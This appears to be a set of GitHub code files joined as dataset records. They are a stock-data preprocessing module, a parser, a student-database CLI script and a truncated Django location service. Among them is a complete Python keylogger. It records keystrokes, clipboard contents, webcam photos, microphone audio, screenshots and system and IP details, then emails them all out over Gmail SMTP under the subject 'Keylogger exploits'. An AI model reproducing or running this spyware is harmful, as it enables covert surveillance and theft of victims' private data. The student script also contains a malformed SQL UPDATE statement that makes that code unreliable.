df.iloc[testset_index:].copy(deep=True)\n\n return train_df, test_df\n\ndef window_df(df, columns, n_trail=1, n_lead=1):\n \"\"\"\n :param df: DataFrame, dataframe object where the columns are the features\n and labels and the rows are days\n :param columns: list of strings, names of the features and labels\n (columns of df) to be used in the time series\n :param n_trail: int, number of days behind day 0 that will be used to\n predict days after day 0\n :param n_lead: int, number of days ahead of day 0 that will be predicted\n\n ---> pandas.DataFrame, dataframe object structured like a time series\n where each row represents an element in the time series, and each\n column is a feature or label a certain amount of days in the future\n or past.\n \"\"\"\n\n df = df[columns]\n dfs = []\n col_names = []\n\n # Create trailing columns\n for i in range(n_trail, 0, -1):\n dfs.append(df.shift(-i))\n col_names += [(col_name + '(t-{})'.format(i)) for col_name in columns]\n\n # Create leading columns\n for i in range(0, n_lead+1):\n dfs.append(df.shift(i))\n col_names += [(col_name + '(t+{})'.format(i)) for col_name in columns]\n\n agg = pd.concat(dfs, axis=1)\n agg.columns = col_names\n\n agg.dropna(inplace=True)\n\n return agg\n\ndef extract_dataset(df, fcols, tcols, lag, forecast, single_step):\n \"\"\"\n lag must > 0 same with forecast\n \"\"\"\n\n w_df = window_df(df, set(fcols+tcols), n_trail=lag-1, n_lead=forecast)\n\n features = {fcol: w_df[\n [col\n for col in w_df.columns if fcol in col][:-forecast]\n ].values\n for fcol in fcols}\n if single_step:\n targets = {'_'.join([tcol, 'target']): w_df[\n [col\n for col in w_df.columns\n if tcol in col][-1]\n ].values\n for tcol in tcols}\n else:\n targets = {'_'.join([tcol, 'target']): w_df[\n [col\n for col in w_df.columns\n if tcol in col][-forecast:]\n ].values\n for tcol in tcols}\n\n return features, targets\n\n###############################################################\n## END Functions for preprocessing dataset pandas.DataFrames ##\n###############################################################\n\n\n##########################################\n## Functions for preprocessing datasets ##\n##########################################\n\ndef sample_text_feature(feature, seed):\n \"\"\"\n \"\"\"\n\n def sample_element(el):\n texts = []\n for timestep in el:\n days_texts = json.loads(timestep)\n texts.extend(days_texts)\n if texts:\n text = np.random.choice(texts, size=1)[0]\n else:\n text = np.nan\n return text\n\n np.random.seed(seed)\n\n sampled_feature = np.asarray(list(map(sample_element, feature)))\n\n return sampled_feature\n\n\ndef norm_text_feature(feature, cut_off, norm_dir):\n \"\"\"\n \"\"\"\n\n def norm_text(link):\n print(link)\n if link == 'nan':\n norm_link = link\n else:\n root, doc_name = os.path.split(link)\n save_point = os.path.join(root, norm_dir)\n if not os.path.exists(save_point):\n os.makedirs(save_point)\n\n norm_link = os.path.join(save_point, doc_name)\n\n with open(link, 'r') as file:\n raw_document = file.read()\n norm_doc = normalize_document(raw_document,\n remove_large_words=cut_off)\n with open(norm_link, 'w') as norm_file:\n norm_file.write(norm_doc)\n return norm_link\n\n normed_feature = np.asarray(list(map(norm_text, feature)))\n\n return normed_feature\n\ndef encode_text_feature(feature, vocab):\n \"\"\"\n \"\"\"\n\n def encode_text(link):\n if link == 'nan':\n encoded_text = []\n else:\n with open(link, 'r') as f:\n text = f.read()\n encoded_text = [vocab.get(word, 0) for word in text.split()]\n return np.asarray(encoded_text)\n\n encoded_feature = np.asarray(list(map(encode_text, feature)))\n\n return encoded_feature\n\ndef pad_text_feature(feature):\n \"\"\"\n \"\"\"\n\n doc_lens = map(lambda arr: arr.shape[-1], feature)\n longest_doc_len = max(doc_lens)\n pad_doc = lambda arr: np.pad(arr, ((0, longest_doc_len - arr.shape[-1])),\n constant_values=0)\n return np.stack(list(map(pad_doc, feature)), axis=0)\n\ndef transform_ds(dataset, fnames, func, **params):\n \"\"\"\n \"\"\"\n\n features, targets = deepcopy(dataset)\n\n for fname in fnames:\n features[fname] = func(features[fname], **params)\n\n return features, targets\n\ndef shuffle_dataset(dataset, seed):\n \"\"\"\n \"\"\"\n\n np.random.seed(seed)\n features, labels = dataset\n dataset_size = len(next(iter(features.values())))\n shuffled_indices = np.random.choice(dataset_size, size=dataset_size,\n replace=False)\n features_shuffled = {fname: feature[shuffled_indices]\n for fname, feature in features.items()}\n labels_shuffled = {lname: label[shuffled_indices]\n for lname, label in labels.items()}\n return features_shuffled, labels_shuffled\n\n# Functions for building vocabularies from datasets\n\ndef gen_feature_vocab(feature, path_to_vocab):\n \"\"\"\n \"\"\"\n\n def text_vocab(link):\n if link != 'nan':\n with open(link, 'r') as f:\n text = f.read()\n vocab = append_vocab(text, path_to_vocab)\n return None\n\n for link in feature:\n text_vocab(link)\n\n return None\n\ndef gen_vocabulary(dataset, fnames, path_to_vocab):\n \"\"\"\n \"\"\"\n\n features, targets = dataset\n\n for fname in fnames:\n gen_feature_vocab(features[fname], path_to_vocab)\n\n return None\n\ndef build_vocabulary(dataset, fnames, path_to_vocab):\n \"\"\"\n \"\"\"\n\n if os.path.isfile(path_to_vocab):\n os.remove(path_to_vocab)\n gen_vocabulary(dataset, fnames, path_to_vocab)\n with open(path_to_vocab, 'r') as f:\n vocab = json.load(f)\n\n return vocab\n\n\n# END functions for building vocabularies from datasets\n\n# Helper postprocessing functions\n\ndef encode_pad_dataset(dataset, fnames, vocab):\n \"\"\"\n \"\"\"\n\n encoded_ds = transform_ds(dataset, fnames, encode_text_feature, vocab=vocab)\n padded_ds = transform_ds(encoded_ds, fnames, pad_text_feature)\n\n return padded_ds\n\n# END helper postprocessing functions\n\n##############################################\n## END Functions for preprocessing datasets ##\n##############################################\n\n\n#############################\n## Preprocessing functions ##\n#############################\n\ndef preprocess(df, feature_tickers, target_tickers, feature_names, target_names,\n lag, forecast, single_step, **kwargs):\n \"\"\"\n \"\"\"\n\n fcols = ['_'.join([n, t]) for n in feature_names for t in feature_tickers]\n tcols = ['_'.join([n, t]) for n in target_names for t in target_tickers]\n\n ds = extract_dataset(df, fcols, tcols, lag, forecast, single_step)\n\n if '8-k' in feature_names:\n # Getting text preprocessing parameters\n norm_dir = kwargs.get('norm_dir', 'norm')\n seed = kwargs.get('seed', None)\n try:\n cut_off = kwargs['cut_off']\n except KeyError as e:\n msg = 'preprocess() missing key word argument: \\'cut_off\\'. Argument is required when \\'feature_names\\' includes \\'8-k\\' as a feature to preprocess.'\n raise TypeError(msg) from e\n\n fcols_8k = ['_'.join(['8-k', t]) for t in feature_tickers]\n\n # Downsampling 8-K features to 1 document per sample\n ds = transform_ds(ds, fcols_8k, sample_text_feature, seed=seed)\n # Normalizing all text documents in the dataset\n ds = transform_ds(ds, fcols_8k, norm_text_feature, cut_off=cut_off,\n norm_dir=norm_dir)\n return ds\n\n#################################\n## END Preprocessing functions ##\n#################################\n","repo_name":"Evbor/Stock_Analysis","sub_path":"stockanalysis/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":10971,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"26804501597","text":"import re\n\nfrom ._parse_common import SEP_STR, NOT_OP, \\\n DoNotSkip, NoLastID, check_skip, Form, _ch_is, _form_to_ch, Node, \\\n _node_is, _create_node\nfrom ._error import CantParse, ParseError\nfrom ._normalize import _shrink_separator_span\n# read forward in the source to get the name of the operator\n# stops when it finds an unescaped separator or brace\noperator_reader = re.compile(r'^(?:`[`\\n\\t {}]|[^`\\n\\t {}])+')\n# find unescaped open braces\nunesc_opens = re.compile(r'(? 1 else 0\n ].span()[0],\n idx + closes_after[\n 1 if len(closes_after) > 1 else 0\n ].span()[1]\n )\n\n\ndef _brace_match(fname, source):\n '''\n find unmatched braces in the source.\n\n matches from left-to-right. in `{ { }`, the first open brace will be\n found to match the close brace, so the second open brace will be\n considered stray and reported as an error.\n\n similarly, in `{ } }`, the first pair of braces will match, and the\n last brace will be considered stray.\n '''\n # should escape the next char / have we seen an open brace yet\n escape_next = seen_open = False\n depth = 0\n line = col = 1\n # total number of unescaped close braces for the entire source\n count_close = _count_found(unesc_closes, source)\n for idx, ch in enumerate(source):\n if escape_next:\n escape_next = False\n # print(f\"escaped {repr(ch)} at {idx} ({line}:{col-1})\")\n col += 1\n continue\n\n if ch == ESCAPE:\n escape_next = True\n elif ch == '\\n':\n col = 1\n line += 1\n continue\n\n elif _ch_is(ch, Form.OPEN):\n # looking for STRAY OPENS\n seen_open = True\n depth += 1\n offset = 2\n # there are no close braces in this program\n if count_close == 0:\n raise ParseError(fname, CantParse.STRAY_OPEN, source,\n idx - offset, len(source), offset,\n idx, line, col)\n\n # we have gone deeper than we can return from\n if depth > count_close:\n begin, end = _create_context(source, idx)\n raise ParseError(fname, CantParse.STRAY_OPEN, source, begin,\n end, idx - begin, idx, line, col)\n\n elif _ch_is(ch, Form.CLOSE):\n # looking for STRAY CLOSES\n depth -= 1\n offset = 2\n if not seen_open:\n raise ParseError(fname, CantParse.STRAY_CLOSE, source, 0,\n idx + offset, 0, idx, line, col)\n if depth < 0:\n begin, end = _create_context(source, idx)\n raise ParseError(fname, CantParse.STRAY_CLOSE, source, begin,\n end, idx - begin, idx, line, col)\n col += 1\n return depth\n\n\ndef _parse_to_tree(source, fname, strip=False, skip_to_idx=DoNotSkip, depth=0, line=1, col=1):\n if depth == 0 and _unbalanced_braces(source):\n _brace_match(fname, source)\n return [{}]\n\n building = []\n escape_next = False\n last_id = NoLastID\n\n idx = 0\n for idx, ch in enumerate(source):\n # print(\n # '>' * (depth + 1)\n # + f\"\\tidx: {idx}\\t({line}:{col})\\tch: {repr(ch)} \\t-> {skip_to_idx}\"\n # f\"({repr(source[skip_to_idx]) if skip_to_idx < len(source) else ''})\"\n # )\n # aka idx < skip_to_idx\n if skip_to_idx > idx:\n continue\n if skip_to_idx == idx:\n skip_to_idx = DoNotSkip\n if not escape_next and ch == ESCAPE:\n escape_next = True\n continue\n\n # passed the target or we are closing a form: return\n # aka idx > skip_to_idx\n if skip_to_idx < idx or (not escape_next and _ch_is(ch, Form.CLOSE)):\n return building, idx, line, col\n\n if not escape_next and ch in SEP_STR:\n if ch == '\\n':\n line += 1\n col = 1\n else:\n col += 1\n # omit the separator in { A} {A } {A {B}} {{A} B} { {A} {B} }\n if strip:\n if idx in (0, len(source) - 1):\n continue\n\n next_ch = source[idx + 1]\n\n if next_ch in SEP_STR:\n sep_node, skip_to_idx = _shrink_separator_span(\n True, source, idx, last_id\n )\n\n check_skip(skip_to_idx)\n\n last_id = Node.SEPARATOR\n building.extend(sep_node)\n continue\n\n # NOTE: skip the separator if we are NOT between two operators\n # the only semantic separators in { A} {A } {A A} {A {B}}\n # {{A} B} { {A} {B} } etc\n # are in {A A}\n if not (_node_is(last_id, Node.OPERATOR)\n and next_ch not in NOT_OP):\n continue\n\n last_id = Node.SEPARATOR\n building.append(\n _create_node(Node.SEPARATOR, SEP_STR.index(ch))\n )\n\n elif not escape_next and _ch_is(ch, Form.OPEN):\n operand, skip_to_idx, line, col = _parse_to_tree(\n source,\n fname,\n strip=strip,\n skip_to_idx=idx + 1,\n depth=depth + 1,\n line=line,\n col=col\n )\n\n check_skip(skip_to_idx)\n\n building.append( _create_node(Node.OPERAND, operand) )\n last_id = Node.OPERAND\n skip_to_idx += 1\n col += 1\n\n elif ch not in NOT_OP:\n match = _operator_name(source[idx:])\n building.append( _create_node(Node.OPERATOR, match.group()) )\n last_id = Node.OPERATOR\n skip_to_idx = idx + match.span()[1]\n col += match.span()[1] + 1\n escape_next = False\n else:\n raise ValueError(ch, 'parser bug found!')\n\n return building, idx, line, col\n\n\ndef _parse(source, fname='input', strip=False):\n return [ *_parse_to_tree(source, fname, strip) ][0]\n\n\ndef _parse_file(fp, fname='input', strip=False):\n return _parse(fp.read().rstrip('\\n\\r'), fname, strip)\n","repo_name":"catb0t/ast-schemas","sub_path":"om/ompy/parser/_parse.py","file_name":"_parse.py","file_ext":"py","file_size_in_byte":7489,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"24707980294","text":"import requests, json\nimport mysql.connector\nimport os\nimport time\nimport sys\nfrom tabulate import tabulate\n\nheaders = {\n 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0',\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',\n 'Accept-Language': 'en-US,en;q=0.5',\n 'Alt-Used': 'api.abcfdab.cfd',\n 'Connection': 'keep-alive',\n 'Upgrade-Insecure-Requests': '1',\n 'Sec-Fetch-Dest': 'document',\n 'Sec-Fetch-Mode': 'navigate',\n 'Sec-Fetch-Site': 'none',\n 'Sec-Fetch-User': '?1',\n 'TE': 'trailers',\n}\nconfig=mysql.connector.connect(host=\"localhost\", user=\"root\", password=\"\", database=\"db_akademik_0572\")\ndef animate():\n #animation = [\"10%\", \"20%\", \"30%\", \"40%\", \"50%\", \"60%\", \"70%\", \"80%\", \"90%\", \"100%\"]\n animation = [\"[■□□□□□□□□□]\",\"[■■□□□□□□□□]\", \"[■■■□□□□□□□]\", \"[■■■■□□□□□□]\", \"[■■■■■□□□□□]\", \"[■■■■■■□□□□]\", \"[■■■■■■■□□□]\", \"[■■■■■■■■□□]\", \"[■■■■■■■■■□]\", \"[■■■■■■■■■■]\"]\n\n print(\"Database terhubung dan menyiapkan API untuk diimport ke database\")\n for i in range(len(animation)):\n time.sleep(0.2)\n sys.stdout.write(\"\\r\" + animation[i % len(animation)])\n sys.stdout.flush()\n\ndef api2db():\n api_url=\"https://api.abcfdab.cfd/students/\"\n response = requests.get(api_url, headers=headers).json()\n for id in range(0,50):\n data_response=response['data'][id]\n id=data_response['id']\n nim=data_response['nim']\n nama=data_response['nama']\n jk=data_response['jk']\n jurusan=data_response['jurusan']\n alamat=data_response['alamat']\n config.reconnect()\n cursor = config.cursor()\n cursor.execute(\"INSERT INTO tbl_students_0572 (id, nim, nama, jk, jurusan, alamat) VALUES (%s, %s, %s, %s, %s, %s)\", (id, nim, nama, jk, jurusan, alamat))\n config.commit()\n print(f\"\\nData dengan NIM : {nim} telah berhasil diimport kedalam database!\")\n print(\"\\nSemua data berhasil diimport!\\n\")\n # print(f\"Nama : {nama}\\nNim : {nim}\\nJenis Kelamin : {jk}\\nJurusan : {jurusan}\\nAlamat : {alamat}\\n\\n\")\ndef menu():\n print(\"\\n=== Main Menu ===\")\n print(\"[1] Lihat Daftar Mahasiswa\")\n print(\"[2] Buat Mahasiswa Baru\")\n print(\"[3] Edit Mahasiswa\")\n print(\"[4] Hapus Mahasiswa\")\n print(\"[5] Cari Mahasiswa\")\n print(\"[0] Exit\")\n print(\"------------------------\")\n pilihan_menu = input(\"Pilih menu> \")\n \n if(pilihan_menu == \"1\"):\n tampilkan_mahasiswa()\n elif(pilihan_menu == \"2\"):\n buat_mahasiswa()\n elif(pilihan_menu == \"3\"):\n edit_mahasiswa()\n elif(pilihan_menu == \"4\"):\n hapus_mahasiswa()\n elif(pilihan_menu == \"5\"):\n cari_mahasiswa()\n elif(pilihan_menu == \"0\"):\n exit()\n else:\n print(\"Inputan salah!\")\n kembali_ke_menu()\ndef kembali_ke_menu():\n print(\"\\n\")\n input(\"Tekan Enter untuk kembali...\")\n menu()\ndef tampilkan_mahasiswa():\n tampil=input(\"\"\"\n1. Tampilkan seluruh Mahasiswa\n2. Tampilkan Mahasiswa berdasarkan limit\n3. Tampilkan Mahasiswa berdasarkan kecocokan nama\ninput> \"\"\")\n if tampil==\"1\":\n\n config.reconnect()\n cursor = config.cursor()\n cursor.execute('SELECT * FROM tbl_students_0572')\n result = cursor.fetchall()\n cursor.close()\n table=[]\n\n for row in result:\n data=[row[0],row[1],row[2],row[3],row[4],row[5]]\n table.append(data)\n print(tabulate(table,headers=[\"ID\",\"NIM\",\"NAMA\",\"Jenis Kelamin\",\"Jurusan\",\"Alamat\"],tablefmt=\"pretty\"))\n menu()\n elif tampil==\"2\":\n limit_set=input(\"Limit yang Anda inginkan : \")\n config.reconnect()\n cursor = config.cursor()\n cursor.execute('SELECT * FROM tbl_students_0572 LIMIT %s', (limit_set, ))\n result = cursor.fetchall()\n cursor.close()\n table=[]\n for row in result:\n data=[row[0],row[1],row[2],row[3],row[4],row[5]]\n table.append(data)\n print(tabulate(table,headers=[\"ID\",\"NIM\",\"NAMA\",\"Jenis Kelamin\",\"Jurusan\",\"Alamat\"],tablefmt=\"pretty\"))\n menu()\n elif tampil==\"3\":\n nama_cari=input(\"Nama yang ingin Anda tampilkan :\")\n config.reconnect()\n cursor = config.cursor()\n cursor.execute('SELECT * FROM tbl_students_0572 WHERE nama LIKE %s', (\"%\" + nama_cari + \"%\",))\n result = cursor.fetchall()\n cursor.close()\n table=[]\n for row in result:\n data=[row[0],row[1],row[2],row[3],row[4],row[5]]\n table.append(data)\n print(tabulate(table,headers=[\"ID\",\"NIM\",\"NAMA\",\"Jenis Kelamin\",\"Jurusan\",\"Alamat\"],tablefmt=\"pretty\")) \n menu()\n else:\n input(\"Inputan yang Anda masukkan salah\\n\\nTekan enter untuk kembali\")\n tampilkan_mahasiswa()\ndef buat_mahasiswa():\n nim = input(\"NIM Mahasiswa (xx.xx.xxxx) : \")\n nama = input(\"Nama Mahasiswa : \")\n jk = input(\"Jenis Kelamin Mahasiswa (L/P) : \")\n jurusan = input(\"Jurusan Mahasiswa : \")\n alamat = input(\"Alamat Mahasiswa : \")\n config.reconnect()\n cur = config.cursor()\n cur.execute('INSERT INTO tbl_students_0572 (nim, nama, jk, jurusan, alamat) VALUES (%s, %s, %s, %s, %s)', (nim, nama, jk, jurusan, alamat))\n config.commit()\n print(f\"\\nData dengan NIM : {nim}\\nTelah terinput!\\n\") \n time.sleep(2) \n menu()\ndef edit_mahasiswa():\n cari_nim=input(\"Cari NIM Mahasiswa yang ingin anda ganti : \")\n config.reconnect()\n cur = config.cursor()\n cur.execute('SELECT * FROM tbl_students_0572 WHERE nim LIKE %s', (\"%\" + cari_nim + \"%\",))\n res = cur.fetchall()\n cur.close()\n print(f\"\\nNIM yang sesuai dengan {cari_nim} : \\n\")\n table=[]\n for row in res:\n data=[row[0],row[1],row[2],row[3],row[4],row[5]]\n table.append(data)\n print(tabulate(table,headers=[\"ID\",\"NIM\",\"NAMA\",\"Jenis Kelamin\",\"Jurusan\",\"Alamat\"],tablefmt=\"pretty\"))\n nim_cari=input(\"\\nMasukkan NIM yang ingin di edit secara lengkap (xx.xx.xxxx) :\")\n print(f\"\\nGanti data {nim_cari}\\n\")\n nim = input(\"NIM Mahasiswa baru (xx.xx.xxxx) : \")\n nama = input(\"Nama Mahasiswa baru : \")\n jk = input(\"Jenis Kelamin Mahasiswa baru (L/P) : \")\n jurusan = input(\"Jurusan Mahasiswa baru : \")\n alamat = input(\"Alamat Mahasiswa baru : \")\n config.reconnect()\n cur = config.cursor()\n cur.execute('UPDATE mahasiswa SET (nim, nama, jk, jurusan, alamat) VALUES (%s, %s, %s, %s, %s) WHERE nim_cari=%s', (nim, nama, jk, jurusan, alamat, nim_cari))\n config.commit() \n print(f\"\\nData dengan NIM : {nim}\\nTelah terupdate!\\n\") \n time.sleep(2)\n menu()\ndef cari_mahasiswa():\n cari_nim=input(\"Cari NIM Mahasiswa yang ingin anda ganti : \")\n config.reconnect()\n cur = config.cursor()\n cur.execute('SELECT * FROM tbl_students_0572 WHERE nim LIKE %s', (\"%\" + cari_nim + \"%\",))\n res = cur.fetchall()\n cur.close()\n print(f\"\\nNIM yang sesuai dengan {cari_nim} : \\n\")\n table=[]\n for row in res:\n data=[row[0],row[1],row[2],row[3],row[4],row[5]]\n table.append(data)\n print(tabulate(table,headers=[\"ID\",\"NIM\",\"NAMA\",\"Jenis Kelamin\",\"Jurusan\",\"Alamat\"],tablefmt=\"pretty\"))\n menu()\ndef hapus_mahasiswa():\n cari_nim=input(\"Cari NIM Mahasiswa yang ingin anda hapus : \")\n config.reconnect()\n cur = config.cursor()\n cur.execute('SELECT * FROM tbl_students_0572 WHERE nim LIKE %s', (\"%\" + cari_nim + \"%\",))\n res = cur.fetchall()\n cur.close()\n print(f\"\\nNIM yang sesuai dengan {cari_nim} : \\n\")\n table=[]\n for row in res:\n data=[row[0],row[1],row[2],row[3],row[4],row[5]]\n table.append(data)\n print(tabulate(table,headers=[\"ID\",\"NIM\",\"NAMA\",\"Jenis Kelamin\",\"Jurusan\",\"Alamat\"],tablefmt=\"pretty\"))\n nim_cari=input(\"\\nMasukkan NIM yang ingin di edit secara lengkap (xx.xx.xxxx) :\")\n config.reconnect()\n cur = config.cursor()\n cur.execute('DELETE FROM tbl_students_0572 WHERE nim=%s', (nim_cari,))\n config.commit()\n print(f\"\\nData dengan NIM : {nim_cari}\\nTelah terhapus!\\n\") \n time.sleep(2)\n menu()\nif __name__ == '__main__':\n if config.is_connected():\n print('Database sudah terhubung\\n')\n cursor = config.cursor()\n sql = \"\"\"SELECT count(*) as tot FROM tbl_students_0572\"\"\"\n cursor.execute(sql)\n data = cursor.fetchone()\n config.close()\n cek_table=data[0]\n if cek_table==0:\n animate()\n api2db()\n print(\"\\nMemasuki menu utama\")\n time.sleep(2)\n menu() \n else:\n print(\"Data sudah ada, memasuki menu utama\")\n time.sleep(2)\n menu()\n \n#20.83.0572_Raihan Rinto Andiansyah\n","repo_name":"zeromount/uas-pemrograman-python-0572","sub_path":"fetch_input2db_0572.py","file_name":"fetch_input2db_0572.py","file_ext":"py","file_size_in_byte":8798,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"33931079","text":"from email.message import EmailMessage # Import for sending Email\r\nimport smtplib # This import is for SMTP protocol\r\n# These are mainly used for absolute path concatenation with filenames\r\nimport os\r\nfrom os import listdir\r\nfrom os.path import isfile, join\r\n\r\nimport socket\r\nimport platform\r\nimport win32clipboard # This is for import for clipboard for windows\r\nfrom pynput.keyboard import Key, Listener # These are main imports for Keylogger\r\n\r\nimport time # This is used for timer\r\n# \".wav\" is the format used for saving audio recordings.\r\nfrom scipy.io.wavfile import write\r\nimport sounddevice as sd\r\n\r\nfrom requests import get\r\n\r\nfrom PIL import ImageGrab # For screenshots\r\nimport cv2 # This is for OpenCV, Image Capture through Webcam\r\nimport threading # I am using threading to run parallel process,so threading based import\r\n\r\nkeys_information = \"key_log_trial.txt\" # Record Keystrokes\r\nsystem_information = \"systeminfo_trial.txt\" # Record System Info\r\nclipboard_information = \"clipboard_trial.txt\" # Record Copy paste content\r\naudio_information = \"audio_trial\" # Record audio of user\r\nscreenshot_information = \"screenshot_trial\" # Screen record image\r\n\r\nfile_path = \" Enter the file path to which you want to store the result \" # Filepath of project\r\nextend = \"\\\\\" # Just an extension for path symbol\r\nemail_address = \"Email Address\" # From email address\r\npassword = \" Password\" # Password\r\ntoaddr = \" Enter To Address Email\"\r\n\r\nmicrophone_time = 20 # Microphone recording time period\r\ncount = 0 # This is another counter keeping tab of no.of keys pressed\r\nkeys = [] # This keep tab of the keys pressed\r\nstoppingTime = time.time() + 30 # This is the timer for which keys are recorded\r\n\r\n\r\ndef on_press(key): # Fn to tell what to do when a key is pressed\r\n global keys, count, currentTime\r\n\r\n print(key) # I am printing the keys onto the terminal\r\n keys.append(key) # Append the key pressed to keys list\r\n count += 1 # Updating the counter by 1\r\n currentTime = time.time() # Getting the present time\r\n\r\n if count >= 1: # If count is non-zero\r\n count = 0 # Reset counter to zero\r\n write_file(keys) # Write keys list to file\r\n keys = [] # Reinitialise keys list\r\n\r\ndef write_file(keys): # Fn specifying how to write to file\r\n with open(file_path + extend + keys_information, \"a\") as f: # Opening file\r\n for key in keys: # Paring through keys list\r\n k = str(key).replace(\"'\", \"\") # All keys are enclosed in single quotes,I am removing them\r\n if k.find(\"space\") > 0: # If space key is found\r\n f.write('Key.Space') # I am writing Key.Space\r\n f.close() # Close the file\r\n\r\n elif k.find(\"Key\") == -1: # For any other key\r\n f.write(k) # Write that key\r\n f.close() # Close the file\r\n\r\ndef on_release(key): # Fn telling when to release or stop listening\r\n if key == Key.esc: # If escape key is pressed,then stop listening\r\n return False\r\n if currentTime > stoppingTime: # If current time exceeds set time,then stop listening\r\n return False\r\n\r\ndef computer_information(): # Fn to find computer system information\r\n with open(file_path + extend + system_information, \"a\") as f: # To open the file in append mode\r\n hostname = socket.gethostname() # To get hostname\r\n IPAddr = socket.gethostbyname(hostname) # To get IP address\r\n try:\r\n public_ip = get(\"https://api.ipify.org\").text # Using API to get public IP,but this has limit for free use so in try-except\r\n f.write(\"Public IP Address: \" + public_ip) # To get Public IP address\r\n\r\n except Exception:\r\n f.write(\"Couldn't get Public IP Address(most likely max query)\") # Any possible exception\r\n\r\n f.write(\"Processor: \" + (platform.processor()) + '\\n') # To find Processor\r\n f.write(\"System: \" + platform.system() + \" \" + platform.version() + '\\n') # To find Platform(Windows here) and Version\r\n f.write(\"Machine: \" + platform.machine() + '\\n') # To find Platform machine(AMD64 in my case)\r\n f.write(\"Hostname: \" + hostname + '\\n') # To find Hostname\r\n f.write(\"Private IP Address: \" + IPAddr + '\\n') # To find IP Address\r\n\r\ndef copy_clipboard(): # Fn to copy clipboard information\r\n with open(file_path + extend + clipboard_information, \"a\") as f: # To open file\r\n try:\r\n win32clipboard.OpenClipboard() # To open Clipboard\r\n pasted_data = win32clipboard.GetClipboardData() # To get Clipboard Data\r\n win32clipboard.CloseClipboard() # Close Clipboard\r\n\r\n f.write(\"Clipboard Data: \\n\" + pasted_data) # Write copied data to file\r\n\r\n except:\r\n f.write(\"Clipboard could be not be copied\") # In case of any internal errors due to Windows\r\n\r\ndef send_email(toaddr): # To send email\r\n fromaddr = email_address # From Address\r\n msg = EmailMessage() # Email Constructor\r\n msg['From'] = fromaddr # From Address\r\n msg[\"To\"] = toaddr # To Address\r\n msg[\"Subject\"] = \"Keylogger exploits:\" # Subject line\r\n msg.set_content('Contains attachments for Keylogger,Screenshots,Audio Clips,Webcam Images,Clipboard and System Settings') # EMail Body\r\n\r\n files_in_dir = [f for f in listdir('File path') if isfile(join('File Path', f))]\r\n #print(files_in_dir) # files_in_dir is used to retrieve all files in keylogger/trial directory\r\n outdir = 'File Path'\r\n for file in files_in_dir: # Looping through each file in directory,read file,give filename and adding attachment\r\n with open(os.path.join(outdir, file), 'rb') as f:\r\n file_data = f.read() # Read file\r\n file_name = f.name # Name of the file\r\n\r\n msg.add_attachment(file_data, maintype = 'application', subtype = 'octet-stream', filename = file_name) # Add attachment\r\n\r\n with smtplib.SMTP('smtp.gmail.com', 587) as smtp: # SMTP protocol with port 587\r\n smtp.starttls() # Starting Transport Layer Security(TLS)\r\n smtp.login(fromaddr, password) # Login to from email using email and password\r\n smtp.send_message(msg) # Send message\r\n\r\ndef Camera_Capture(number_of_iterations):\r\n cam = cv2.VideoCapture(0, cv2.CAP_DSHOW) # Create an object of class VideoCapture using Webcam 0 and DirectShow API Preference\r\n ret, frame = cam.read() # Capture webcam image by frame (return value,image)\r\n img_name = \"Target user pic at \" # For Naming file\r\n outdir = 'File Path'\r\n cv2.imwrite(os.path.join(outdir , img_name + str(number_of_iterations) + \" iteration.png\"), frame) # Write the given frame with the given name\r\n cam.release() # Release resources\r\n\r\ndef microphone(number_of_iterations):\r\n fs = 44100 # Sampling frequency\r\n seconds = microphone_time # Time for which microphone is active\r\n\r\n myrecording = sd.rec(int(seconds * fs), samplerate=fs, channels=2) # sd(SoundDevice library) records microphone\r\n sd.wait() #To pause/stop recording\r\n\r\n write(file_path + extend + audio_information + str(number_of_iterations) + \".wav\", fs, myrecording) # Saving file\r\n\r\ndef screenshot(number_of_iterations):\r\n im = ImageGrab.grab() # Take a screenshot\r\n im.save(file_path + extend + screenshot_information + str(number_of_iterations) +\".png\") # Save file\r\n\r\ndef logger1():\r\n with Listener(on_press=on_press, on_release=on_release) as listener: # listener that starts with on_press fn and stops with on_release fn\r\n listener.join()\r\ndef logger2(n):\r\n copy_clipboard()\r\n Camera_Capture(n)\r\n screenshot(n)\r\n microphone(n)\r\n send_email(toaddr)\r\n\r\ndef main():\r\n\r\n computer_information()\r\n t1 = threading.Thread(target = logger1) # Creating thread with logger1 fn to be executed\r\n t2 = threading.Thread(target=logger2, args = [1]) # Creating thread with logger2 fn to be executed\r\n t1.start() # Start thread\r\n t2.start() # Start thread\r\n t1.join() # For concurrent execution\r\n t2.join() # For concurrent execution\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n\r\n","repo_name":"pundaree369/Keylogger-Using-Python","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9414,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"24354436149","text":"import json\n\nfrom rest_framework.renderers import JSONRenderer\n\nfrom api.handlers.master_location_model_handler import MasterLocationModelHandler\nfrom api.handlers.location_info_model_handler import LocationInfoModelHandler\nfrom api.handlers.user_model_handler import UserModelHandler\nfrom api.serializers.location_info_serializers import MasterLocationSerializer, LocationInfoSerializer\n\n\nclass LocationService():\n\n def __init__(self, current_user):\n self.current_user = current_user\n\n def get_location_list(self):\n queryset = MasterLocationModelHandler().find_all()\n data = MasterLocationSerializer(queryset, many=True).data\n json_data = JSONRenderer().render(data)\n return json_data\n\n def get_user_locations(self, user_id):\n try:\n for_user = UserModelHandler().find_by_id(user_id)\n if for_user:\n queryset = LocationInfoModelHandler().find_by_user(for_user)\n data = LocationInfoSerializer(queryset, many=True).data\n json_data = JSONRenderer().render(data)\n return json_data\n else:\n return json.dumps({\"Error\":\"User Not found\"})\n except Exception as ex:\n return json.dumps({\"Error\":\"Not able to fetch the locations : %s\"%(ex.message)})\n\n def add_user_location_info(self, location_json):\n try:\n location = MasterLocationModelHandler().insert(location_name=location_json[\"location\"])\n created_location_info = LocationInfoModelHandler().insert(\n user = self.current_user,\n location = location,\n when_start_date = location_json[\"when_start_date\"],\n when_end_date = location_json[\"when_end_date\"])\n\n data = LocationInfoSerializer(created_location_info).data\n json_data = 